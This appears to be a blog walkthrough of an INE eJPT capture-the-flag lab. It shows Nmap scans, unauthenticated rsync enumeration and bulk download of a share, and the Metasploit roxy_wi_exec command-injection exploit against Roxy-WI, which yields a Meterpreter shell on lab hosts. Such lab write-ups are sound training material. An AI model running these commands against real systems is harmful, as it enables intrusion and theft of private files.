June 22, 2026
Host & Network Penetration Testing: The Metasploit Framework CTF 2 — eJPT (INE)
Suraj Apar
- 1 Q. Enumerate the open port using Metasploit, and inspect the RSYNC banner closely; it might reveal something interesting.
- 2 Q. The files on the RSYNC server hold valuable information. Explore the contents to find the flag.
- 3 Q. Try exploiting the webapp to gain a shell using Metasploit on target2.ine.local.
- 4 Q. Automated tasks can sometimes leave clues. Investigate scheduled jobs or running processes to uncover the hidden flag.
- 5 Final Thoughts
A walkthrough covering RSYNC enumeration, file exfiltration, Roxy-WI webapp exploitation, and cron job investigation to capture all four flags.
Hello everyone!
In this blog, I'll walk through The Metasploit Framework CTF 2 from INE's eJPT path. Two Linux targets this time — one running an RSYNC service and the other a vulnerable web application. The goal is to capture four flags by enumerating, exploiting, and exploring the right places.
So, let's dive in.
Q. Enumerate the open port using Metasploit, and inspect the RSYNC banner closely; it might reveal something interesting.
As usual, I started with an Nmap scan:
nmap -T5 -sV -O target1.ine.local
Only one port was open — port 873 running rsync (protocol version 31).
I hadn't worked with rsync before so I looked it up. rsync (Remote Sync) is a powerful Linux utility used for copying and synchronizing files either locally or across remote targets. Unlike cp or scp, it uses a delta-transfer algorithm — only sending what's changed rather than copying everything from scratch. More importantly for us: it can expose shared directories without any authentication if misconfigured.
To enumerate what's available on the rsync service:
rsync --list-only rsync://target1.ine.local
The output revealed a share called backupwscohen — and the first flag was right there in the banner alongside it.
Q. The files on the RSYNC server hold valuable information. Explore the contents to find the flag.
With the share name in hand, I listed its contents:
rsync --list-only rsync://target1.ine.local/backupwscohen
Three files came back — TPSData.txt, office_staff.vhd, and pii_data.xlsx. Time to download them all:
rsync -avzp rsync://target1.ine.local/backupwscohen ./lab
Then I read all the files at once:
cd lab/
cat *
Flag 2 was sitting inside one of the downloaded files.
Q. Try exploiting the webapp to gain a shell using Metasploit on target2.ine.local.
I started a fresh Nmap scan on the second target:
nmap -T5 -sV -O target2.ine.local
Ports 80 and 443 were open — both running Apache httpd 2.4.52 (Ubuntu). The hostname in the scan result also gave a clue: roxy-wi.example.com.
I navigated to https://target2.ine.local in the browser.
It was running Roxy-WI — a web UI for managing HAProxy, Nginx, and similar services. I searched Metasploit for a matching exploit:
search roxy-wi
Found exploit/linux/http/roxy_wi_exec — an unauthenticated command injection RCE affecting Roxy-WI prior to version 6.1.1.0, rated excellent. Loaded it up and ran it:
use exploit/linux/http/roxy_wi_exec
set rhosts target2.ine.local
set lhost eth1
run
Meterpreter session opened. I listed the root / directory:
meterpreter > ls /
Flag 3 was right there in the root.
Q. Automated tasks can sometimes leave clues. Investigate scheduled jobs or running processes to uncover the hidden flag.
Still in the same Meterpreter session. The hint was pointing at cron jobs, which on Linux are stored under /etc/cron*.
I listed /etc/ to confirm:
meterpreter > ls /etc/
There it was — a cron.d directory with a recent timestamp standing out from the rest. I explored it:
meterpreter > ls /etc/cron.d
meterpreter > cat /etc/cron.d/www-data-cron
The cron file was running a scheduled echo command every minute — and the string it was echoing was Flag 4.
Final Thoughts
This CTF introduced two techniques worth keeping in your toolkit — RSYNC enumeration and cron job investigation.
RSYNC misconfigurations are more common than you'd think. An unauthenticated RSYNC share essentially hands over the files directly — no exploitation needed, just the right command. And the cron job hunt for Flag 4 is a good habit to build early: automated tasks run as specific users, often with elevated privileges, and what they're executing is frequently overlooked during a pentest.
Thanks for reading!